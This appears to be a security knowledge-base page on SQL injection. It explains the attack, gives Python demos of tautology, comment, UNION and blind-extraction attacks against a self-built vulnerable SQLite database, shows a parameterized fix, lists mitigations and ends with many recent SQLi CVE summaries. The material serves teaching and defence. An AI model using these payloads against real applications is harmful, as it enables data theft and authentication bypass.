SQL Injection

web HIGH

SQL injection exploits the way applications construct database queries by mixing user input directly into SQL statements.

How It Works

When developers concatenate untrusted data into a query instead of binding it as a parameter, an attacker can supply SQL syntax that changes the query's logic. Consider a login that builds SELECT * FROM users WHERE username='<input>' AND password='<input>' from two form fields. Entering ' OR '1'='1 as the password turns the condition into username='x' AND password='' OR '1'='1'; because AND binds tighter than OR, the clause is true for every row, the query returns users and the login succeeds. Entering admin'-- as the username instead comments out the password check and logs the attacker in as that account.

Attackers follow a methodical process: first probing input fields with characters such as quotes, semicolons and comment sequences to trigger database errors or changes in the response that confirm the input reaches a query. Once confirmed, they escalate by injecting statements that extract data (UNION-based attacks append a second SELECT over other tables to the original result set; the column counts must match), modify records, or enumerate the schema through catalog tables such as information_schema. Blind SQL injection variants work when neither errors nor query output are shown: boolean-based attacks infer data one character at a time from whether the page behaves as it does for a true condition, and time-based attacks use database sleep functions so that a response delay confirms a true condition.

Advanced scenarios include second-order injection, where malicious input is stored safely in the database and only becomes dangerous when a later query concatenates the stored value into new SQL, and out-of-band attacks that exfiltrate data through DNS or HTTP requests initiated by the database server when no in-band channel exists. Some database systems also let an injection reach the host: MySQL's LOAD_FILE and SELECT ... INTO OUTFILE read and write server files (which can plant a web shell under the document root), and SQL Server's xp_cmdshell runs operating system commands, escalating from database compromise to full server control.
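The following Python script is an added illustration, not code from the original page or from any of the products it lists. It builds an in-memory SQLite database from a constructed schema (the users, products and passwords are invented) and runs four of the attack patterns described above against two deliberately vulnerable query functions: a tautology in the password field, a comment sequence that strips the password check, a UNION that pulls the users table out through a product lookup, and a boolean-based blind loop that recovers a password one character at a time using nothing but the presence or absence of a result row. SQLite has no SLEEP(), so the time-based variant is not shown; it uses the same probe with a delay in place of the row-count signal.

```python
import sqlite3
import string

# Constructed sample schema and rows for an in-memory SQLite database
# (example data only, not taken from any real application).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'S3cret!', 'admin');
INSERT INTO users VALUES (2, 'bob', 'hunter2', 'user');
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'boots', 49.0);
INSERT INTO products VALUES (2, 'sandals', 19.5);
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_login(conn, username, password):
    """Deliberately vulnerable: both inputs are pasted into the SQL text."""
    sql = (f"SELECT id, username, role FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    return conn.execute(sql).fetchall()


def vulnerable_product_lookup(conn, product_id):
    """Deliberately vulnerable numeric parameter: there are no quotes to break
    out of, so injected text is simply appended to the WHERE clause."""
    sql = f"SELECT name, price FROM products WHERE id={product_id}"
    return conn.execute(sql).fetchall()


# Attack 1: tautology in the password field.  AND binds tighter than OR, so
#   WHERE username='x' AND password='' OR '1'='1'
# is true for every row and the "login" returns all users.
def tautology_bypass(conn):
    return vulnerable_login(conn, "x", "' OR '1'='1")


# Attack 2: comment out the password check to log in as a chosen account.
#   WHERE username='alice'--' AND password='irrelevant'
def comment_bypass(conn, target="alice"):
    return vulnerable_login(conn, f"{target}'--", "irrelevant")


# Attack 3: UNION-based extraction through the product lookup.  The appended
# SELECT must return the same number of columns (two) as the original query.
def union_dump(conn):
    return vulnerable_product_lookup(
        conn, "0 UNION ALL SELECT username, password FROM users")


# Attack 4: boolean-based blind extraction.  Nothing from the users table is
# ever displayed; the only signal is whether the product lookup returns a row.
def blind_extract(conn, user_id=1, max_len=32):
    # The single quote is left out so the probe itself stays well-formed.
    alphabet = string.ascii_letters + string.digits + string.punctuation.replace("'", "")
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (f"1 AND substr((SELECT password FROM users WHERE id={user_id}),"
                     f"{pos},1)='{ch}'")
            if vulnerable_product_lookup(conn, probe):  # a row came back: guess was right
                recovered += ch
                break
        else:
            break  # no character matched: end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("tautology:", tautology_bypass(db))
    print("comment  :", comment_bypass(db))
    print("union    :", union_dump(db))
    print("blind    :", blind_extract(db))
```

The blind loop is the expensive path in practice: one request per candidate character per position, which is why real tooling narrows the alphabet with binary search on character codes and why bursts of near-identical requests from one client are a useful detection signal.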

Impact

  • Complete data breach — extraction of entire database contents including credentials, personal information, and proprietary data
  • Authentication bypass — logging in as any user without knowing passwords
  • Data manipulation — unauthorized modification or deletion of critical records
  • Privilege escalation — granting administrative rights to attacker-controlled accounts
  • Remote code execution — leveraging database features to run operating system commands and compromise the underlying server
  • Lateral movement — using compromised database credentials to access other connected systems

Real-World Examples

FreePBX's CVE-2025-66039 demonstrated a complete attack chain: SQL injection across 11 parameters in four endpoints let attackers write rows into the cron_jobs table, and when the scheduler ran those entries the attacker-supplied commands executed on the host, granting full server control. The vulnerability required no authentication, so anyone who could reach the interface could exploit it.

E-commerce platforms have suffered large breaches through shopping cart SQL injection, where attackers inserted skimming code into stored procedures that executed during checkout and harvested credit card data from thousands of transactions. Healthcare systems have been compromised through patient portal vulnerabilities that exposed millions of medical records when attackers used UNION queries to pull data from tables the portal never exposed directly.

Mitigation

  • Parameterized queries (prepared statements) — the SQL text and the values are sent separately, so input is bound as data and is never parsed as SQL; this is the primary defense. Identifiers (table names, column names, ORDER BY targets) cannot be bound and must be checked against an allowlist instead
  • Object-Relational Mapping (ORM) frameworks — generate parameterized SQL by default; raw-query escape hatches and string-built filter expressions reintroduce the problem
  • Strict input validation — allowlist acceptable characters and formats and reject everything else; a defense-in-depth measure, not a substitute for parameterization
  • Least privilege database accounts — application credentials with only the permissions the application needs (no FILE privilege, no xp_cmdshell, no DDL), so a successful injection cannot reach the host or other databases
  • Web Application Firewall (WAF) — blocks common injection patterns as a secondary layer; encoding and syntax variations bypass signatures, so it never replaces fixing the query
  • Database activity monitoring — alerts on unusual query patterns such as UNION or sleep functions issued by the application account, bursts of syntax errors, or privilege escalation attempts
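The hardened counterpart, again an added example and not code from the page or any listed product. It uses the same constructed schema (invented users, products and passwords) and shows the first three mitigations in working form: the login bound as parameters, a dynamic ORDER BY restricted to an allowlist because identifiers cannot be bound, and a numeric id validated before it is bound. The payloads from the How It Works section return nothing or are rejected before any SQL runs. The plaintext password comparison only mirrors the vulnerable version; real code compares a password hash.

```python
import re
import sqlite3

# Constructed sample schema and rows (example data only, not from any real
# application).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'S3cret!', 'admin');
INSERT INTO users VALUES (2, 'bob', 'hunter2', 'user');
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'boots', 49.0);
INSERT INTO products VALUES (2, 'sandals', 19.5);
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def safe_login(conn, username, password):
    """Parameterized query: the driver receives the SQL text and the values
    separately, so quotes or comment sequences in the input stay data.
    (Plaintext comparison is kept only to mirror the vulnerable version.)"""
    sql = "SELECT id, username, role FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchall()


# Identifiers and keywords cannot be bound, so they come from a fixed allowlist.
ALLOWED_SORT_COLUMNS = {"name", "price"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def list_products(conn, sort_by="name", direction="ASC"):
    """Dynamic ORDER BY: the column and direction are checked against the
    allowlist before they are placed in the SQL text."""
    direction = direction.upper()
    if sort_by not in ALLOWED_SORT_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT name, price FROM products ORDER BY {sort_by} {direction}"
    return conn.execute(sql).fetchall()


# Positive integer with at most ten digits (hypothetical application rule).
ID_PATTERN = re.compile(r"[1-9][0-9]{0,9}")


def get_product(conn, product_id):
    """Defense in depth: validate the shape of a numeric id, then bind it.
    Binding alone already prevents injection; validation rejects junk early
    and keeps garbage out of the database error log."""
    if not ID_PATTERN.fullmatch(str(product_id)):
        raise ValueError("product id must be a positive integer")
    sql = "SELECT name, price FROM products WHERE id=?"
    return conn.execute(sql, (int(product_id),)).fetchall()


def rejected(fn, *args):
    """True if the guarded function refuses the input before any SQL runs."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(safe_login(db, "x", "' OR '1'='1"))       # []  : the tautology is just a wrong password
    print(safe_login(db, "alice'--", "anything"))   # []  : "alice'--" is looked up literally
    print(rejected(list_products, db, "price; DROP TABLE users", "ASC"))               # True
    print(rejected(get_product, db, "0 UNION ALL SELECT username, password FROM users"))  # True
```

Note what each layer does and does not do: binding makes the login payloads inert without any validation, the allowlist is the only thing protecting the ORDER BY, and the id check is redundant for injection but still useful. Least privilege cannot be shown with an in-memory SQLite file; in MySQL or SQL Server it means the application account has no FILE privilege and no access to xp_cmdshell, so the same injection cannot reach the host.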

Recent CVEs (4638)

EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6342 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0, specifically in the /admin/admin_football.php file where the 'pid' parameter is inadequately sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. Exploit code has been published, so no original research is needed to attack exposed instances.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM This Month

Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.0.1, contains an improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service, information disclosure, and information tampering.

SQLi Information Disclosure Denial Of Service +2
NVD
EPSS 0% CVSS 7.3
HIGH POC This Week

A SQL injection vulnerability in a Hospital Management System application (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Hospital Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability, which was classified as critical, was found in PHPGurukul Directory Management System 2.0. This affects an unknown part of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Directory Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability, which was classified as critical, has been found in PHPGurukul Directory Management System 2.0. Affected by this issue is some unknown functionality of the file /admin/manage-directory.php. The manipulation of the argument del leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Directory Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability classified as critical was found in PHPGurukul Directory Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/search-directory.php. The manipulation of the argument searchdata leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Directory Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6330 is a critical SQL injection vulnerability in PHPGurukul Directory Management System version 1.0, specifically in the /searchdata.php file's 'searchdata' parameter. An unauthenticated remote attacker can inject arbitrary SQL commands to compromise confidentiality, integrity, and availability of the underlying database. Public disclosure and proof-of-concept exploitation have occurred, making this an immediately actionable threat despite the moderate CVSS 7.3 score.

PHP SQLi Directory Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6323 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, specifically affecting the /enrollment.php file's 'fathername' parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion of the enrollment database. The vulnerability has public proof-of-concept code available and may be actively exploited in the wild.

PHP SQLi Pre School Enrollment System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6322 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /visit.php file's 'gname' parameter. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands, potentially leading to unauthorized data access, modification, or deletion. Public exploit disclosure and confirmed POC availability significantly elevate real-world exploitation risk.

PHP SQLi Pre School Enrollment System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability has been found in PHPGurukul Pre-School Enrollment System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/add-subadmin.php. The manipulation of the argument sadminusername leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Pre School Enrollment System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability, which was classified as critical, was found in PHPGurukul Pre-School Enrollment System 1.0. Affected is an unknown function of the file /admin/add-class.php. The manipulation of the argument classname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Pre School Enrollment System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability, which was classified as critical, has been found in PHPGurukul Pre-School Enrollment System 1.0. This issue affects some unknown processing of the file /admin/add-teacher.php. The manipulation of the argument tsubject leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Pre School Enrollment System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6318 is a critical SQL injection vulnerability in PHPGurukul Pre-School Enrollment System version 1.0, affecting the /admin/check_availability.php file where the 'Username' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. Public disclosure of exploitation details and confirmed POC availability indicate active exploitation risk in the wild.

PHP SQLi Pre School Enrollment System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6317 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /admin/confirm.php file's ID parameter. An unauthenticated remote attacker can execute arbitrary SQL commands with low complexity, potentially leading to unauthorized data access, modification, or service disruption. Public exploit disclosure and active attack feasibility significantly elevate real-world risk despite the moderate CVSS score of 7.3.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6316 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /admin/admin_running.php file where the 'qty' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this flaw to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while the CVSS score is 7.3 (high), the attack vector is network-based with low complexity, indicating active exploitation is feasible.

PHP SQLi Remote Code Execution +1
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6315 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the /cart2.php endpoint via an unsanitized ID parameter. An unauthenticated remote attacker can exploit this over the network with low complexity to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or denial of service. A public proof-of-concept has been disclosed and the vulnerability may be actively exploited.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6314 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System 1.0, specifically in the /pages/cat_update.php file's ID parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete database contents. The vulnerability has a publicly disclosed exploit (POC available), making it an active threat with immediate exploitation risk; the CVSS 7.3 score reflects moderate-to-high severity with network-based attack capability and no authentication required.

PHP SQLi Sales And Inventory System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6313 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, affecting the /pages/cat_add.php endpoint where the 'Category' parameter is improperly sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially compromising data confidentiality, integrity, and availability. The vulnerability has been publicly disclosed with exploit code available and may be actively exploited in the wild.

PHP SQLi Sales And Inventory System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6312 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0, specifically in the /pages/cash_transaction.php file where the 'cid' parameter is insufficiently sanitized. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. Exploitation details have been published, so exposed instances can be attacked without further research.

PHP SQLi Sales And Inventory System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6311 is a critical SQL injection vulnerability in Campcodes Sales and Inventory System version 1.0 affecting the /pages/account_add.php endpoint. Unauthenticated remote attackers can manipulate the 'id' or 'amount' parameters to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has public exploit disclosure and demonstrates active exploitation risk with a CVSS score of 7.3 indicating medium-to-high severity.

PHP SQLi Sales And Inventory System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

A SQL injection vulnerability in an Emergency Ambulance Hiring Portal application (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Emergency Ambulance Hiring Portal
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability classified as critical was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add-ambulance.php. The manipulation of the argument ambregnum leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Emergency Ambulance Hiring Portal
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability classified as critical has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected is an unknown function of the file /admin/bwdates-request-report-details.php. The manipulation of the argument fromdate/todate leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

PHP SQLi Emergency Ambulance Hiring Portal
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6307 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /function/edit_customer.php file, where the 'firstname' parameter is insufficiently sanitized, allowing remote unauthenticated attackers to execute arbitrary SQL queries. The vulnerability has been publicly disclosed with proof-of-concept details available, and while rated 7.3 (High) in CVSS v3.1, the network-accessible attack vector combined with no authentication requirement and a published proof of concept significantly elevates real-world risk. Other parameters in the same function are suspected to be vulnerable to the same injection pattern.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6306 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, affecting the admin authentication mechanism in /admin/admin_index.php. An unauthenticated remote attacker can manipulate the Username parameter to execute arbitrary SQL queries, potentially leading to unauthorized access, data theft, or data manipulation. The vulnerability has been publicly disclosed with working exploits available, making active exploitation likely.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6305 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /admin/admin_feature.php endpoint via the product_code parameter. An unauthenticated remote attacker can execute arbitrary SQL commands to read, modify, or delete database contents. The vulnerability has public exploit disclosure and carries a CVSS 7.3 score with confirmed exploitation potential.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6304 is a critical SQL injection vulnerability in code-projects Online Shoe Store 1.0 affecting the /cart.php file's qty[] parameter, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially extract, modify, or delete sensitive data. The vulnerability has been publicly disclosed with proof-of-concept exploits available, presenting immediate exploitation risk to unpatched instances of this e-commerce application.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6303 is a critical SQL injection vulnerability in code-projects Online Shoe Store version 1.0, specifically in the /contactus1.php file's Message parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making active exploitation likely.

PHP SQLi Online Shoe Store
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

A SQL injection vulnerability in an Employee Record Management System application, classified as critical (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Employee Record Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6296 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /empty_rooms.php file's search_box parameter. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially achieving unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploits available, making active exploitation highly probable in real-world deployments.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

A SQL injection vulnerability in a Hostel Management System application (CVSS 7.3). Risk factors: public PoC available.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6294 is a critical SQL injection vulnerability in code-projects Hostel Management System version 1.0, specifically in the /contact.php file's hostel_name parameter. An unauthenticated remote attacker can exploit this without user interaction to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, and while CVSS 7.3 indicates moderate-to-high severity with confidentiality, integrity, and availability impact, the simplicity of exploitation (network-accessible, no privileges required, low complexity) makes this a practical threat requiring immediate patching.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH POC This Week

CVE-2025-6293 is a critical SQL injection vulnerability in code-projects Hostel Management System v1.0 affecting the /contact_manager.php endpoint, where the student_roll_no parameter is inadequately sanitized, allowing unauthenticated remote attackers to execute arbitrary SQL queries and potentially exfiltrate, modify, or delete database records. A public proof of concept is available, so this should be treated as a high-priority fix.

PHP SQLi Hostel Management System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability classified as critical has been found in Brilliance Golden Link Secondary System up to 20250609. This affects an unknown part of the file /storagework/custTakeInfoPage.htm. The manipulation of the argument custTradeName leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

SQLi Golden Link Secondary System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM POC This Month

A vulnerability was found in Brilliance Golden Link Secondary System up to 20250609. It has been rated as critical. Affected by this issue is some unknown functionality of the file /storagework/rentTakeInfoPage.htm. The manipulation of the argument custTradeName leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

SQLi Golden Link Secondary System
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM This Month

A vulnerability was found in zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 1.0.0. It has been rated as critical. This issue affects some unknown processing of the file /adpweb/a/base/barcodeDetail/. The manipulation of the argument barcodeNo/barcode/itemNo leads to sql injection. The attack may be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way.

SQLi Adp Application Developer Platform
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Critical SQL injection vulnerability in Yirmibes Software MY ERP versions before 1.170 that allows unauthenticated remote attackers to execute arbitrary SQL commands, with complete compromise of data confidentiality, integrity and availability. The CVSS 9.8 (Critical) vector requires no authentication or user interaction and has low attack complexity over the network (AV:N, AC:L), so it is exploitable directly from the internet. EPSS is currently 0% and no KEV listing is shown here, but the vector alone warrants immediate patching.

SQLi
NVD
EPSS 0% CVSS 9.8
CRITICAL POC PATCH Act Now

Critical SQL injection vulnerability in WeGIA (a web-based management system for charitable institutions) affecting the 'id' parameter of the /WeGIA/controle/control.php endpoint in versions prior to 3.4.2. This unauthenticated, network-accessible vulnerability enables attackers to execute arbitrary SQL queries without privileges or user interaction, resulting in complete compromise of database confidentiality, integrity, and availability. The CVSS 9.8 score reflects the severe impact potential; a public proof of concept and a vendor patch are listed, EPSS remains at 0%, and KEV status should be checked against the CISA catalog before deprioritizing.

PHP SQLi Information Disclosure +1
NVD GitHub
EPSS 1% CVSS 9.8
CRITICAL POC Act Now

CloudClassroom-PHP-Project v1.0 contains a critical SQL injection vulnerability in the loginlinkadmin.php component that allows unauthenticated attackers to bypass authentication and gain administrative access by injecting SQL into the username field. With a CVSS score of 9.8 and a network-accessible attack vector requiring no privileges or user interaction, this vulnerability poses immediate and severe risk to all deployments. EPSS is 1% and no KEV listing is shown, but complete authentication bypass, a public proof of concept and trivial exploitation complexity make it a likely target for opportunistic attackers.

PHP SQLi Authentication Bypass +2
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC This Week

SQL injection vulnerability in pbootCMS versions 3.2.5 and 3.2.10 that allows unauthenticated remote attackers to execute arbitrary SQL queries via crafted GET requests, potentially leading to unauthorized data disclosure, modification, or system compromise. With a CVSS score of 8.8, a network attack vector and a user-interaction requirement, this is a serious threat to publicly exposed pbootCMS installations; a public proof of concept is listed, and the high confidentiality, integrity and availability impact makes large-scale exploitation plausible.

SQLi Pbootcms
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Post-authentication SQL injection vulnerability in Trend Micro Endpoint Encryption PolicyServer that allows low-privileged authenticated users to escalate privileges through SQL injection attacks. The vulnerability has a CVSS score of 7.7 (high severity) with significant impact on confidentiality, integrity, and availability. While this is a post-auth vulnerability requiring initial low-privileged code execution, successful exploitation enables privilege escalation, making it a critical concern for organizations running affected PolicyServer instances.

SQLi Trendmicro Privilege Escalation +1
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Post-authentication SQL injection vulnerability in Trend Micro Endpoint Encryption PolicyServer that enables authenticated attackers to escalate privileges and achieve full system compromise (confidentiality, integrity, and availability impact). The vulnerability requires an attacker to first obtain low-privileged code execution on the target system before exploiting the SQL injection to escalate to administrative privileges. With a CVSS score of 8.8 and network accessibility, this represents a significant risk to organizations running vulnerable PolicyServer instances, particularly in environments where initial compromise vectors (phishing, lateral movement, supply chain) are plausible.

SQLi Trendmicro Privilege Escalation +1
NVD
EPSS 0% CVSS 7.7
HIGH PATCH This Week

SQL injection vulnerability in Trend Micro Endpoint Encryption PolicyServer that enables privilege escalation on affected systems. The vulnerability requires an attacker to first obtain low-privileged code execution on the target system, after which SQL injection can be leveraged to escalate privileges and gain high-impact access (confidentiality compromise, integrity violation, availability disruption). With a CVSS score of 7.7 and local attack vector, this poses a significant risk to organizations running vulnerable PolicyServer instances, particularly in multi-user environments or where low-privileged service accounts are present.

SQLi Trendmicro Privilege Escalation +1
NVD
EPSS 0% CVSS 6.5
MEDIUM POC This Month

SQL Injection vulnerability in SeaCMS v.12.9 allows a remote attacker to obtain sensitive information via the admin_datarelate.php component.

PHP SQLi Seacms
NVD GitHub
EPSS 0% CVSS 7.6
HIGH This Week

SQL Injection vulnerability in Anh Tran Slim SEO plugin (versions through 4.5.4) that allows high-privileged attackers to execute arbitrary SQL commands, potentially leading to data exfiltration and service disruption. The vulnerability requires administrator-level privileges to exploit, significantly limiting its real-world impact compared to unauthenticated SQL injection attacks. While the CVSS score of 7.6 indicates moderate-to-high severity, the privilege requirement (PR:H) substantially reduces the practical threat landscape.

SQLi WordPress PHP
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Critical SQL injection vulnerability in Adrian Ladó's PostaPanduri application (versions up to 2.1.3) that allows unauthenticated remote attackers to execute arbitrary SQL commands. The vulnerability has a CVSS score of 9.3 with network-based attack vector and no authentication required, enabling attackers to extract sensitive data from the database and potentially cause service disruption. Real-world exploitation risk is elevated due to the complete lack of authentication requirements and straightforward attack vector.

SQLi PHP
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Blind SQL injection vulnerability in wpjobportal WP Job Portal. The listing shows CVSS 7.5 (high) while the summary text cites 9.3 (critical); confirm the score against NVD before prioritizing. Blind injection means data is extracted through true/false or timing differences rather than visible query output, so the impact on confidentiality is the same as for a visible injection, only slower.

SQLi
NVD
EPSS 0% CVSS 8.5
HIGH This Week

SQL injection vulnerability in WpExperts Hub's Woocommerce Partial Shipment plugin (versions up to 3.2) that allows authenticated attackers with low privileges to execute arbitrary SQL queries. The vulnerability has a CVSS score of 8.5 (High) with network accessibility and low attack complexity, enabling attackers to read sensitive database information and potentially disrupt service availability. The attack requires valid user credentials but no special interaction, making it a significant risk for multi-user WordPress/WooCommerce installations.

WordPress SQLi Woocommerce +1
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Blind SQL injection vulnerability in mojoomla School Management that allows unauthenticated network attackers to extract sensitive data from the application's database without direct visibility of query results. The vulnerability affects School Management versions up to 92.0.0 and carries a CVSS score of 9.3, indicating critical severity. The attack requires no user interaction, no privileges, and low complexity, making it highly exploitable in real-world scenarios.

SQLi Joomla
NVD
EPSS 0% CVSS 8.5
HIGH PATCH This Week

SQL Injection vulnerability in ValvePress Rankie that allows authenticated attackers to execute arbitrary SQL queries, potentially leading to unauthorized data disclosure and service degradation. The vulnerability affects Rankie across unspecified version ranges and requires valid user credentials to exploit. While the CVSS score of 8.5 indicates high severity, real-world exploitation risk depends on whether public proof-of-concept code exists and the prevalence of Rankie deployments in production environments.

SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL Act Now

Blind SQL injection vulnerability in smartiolabs Smart Notification versions through 10.3 that allows unauthenticated remote attackers to extract sensitive database information without direct visibility into query results. The vulnerability has a critical CVSS score of 9.3 with high confidentiality impact; integrity is not affected, while availability can be degraded by the volume of probing queries. The network-accessible vector (AV:N), low attack complexity (AC:L) and absence of authentication (PR:N) make this a priority vulnerability; EPSS is 0% and no KEV listing is shown here.

SQLi
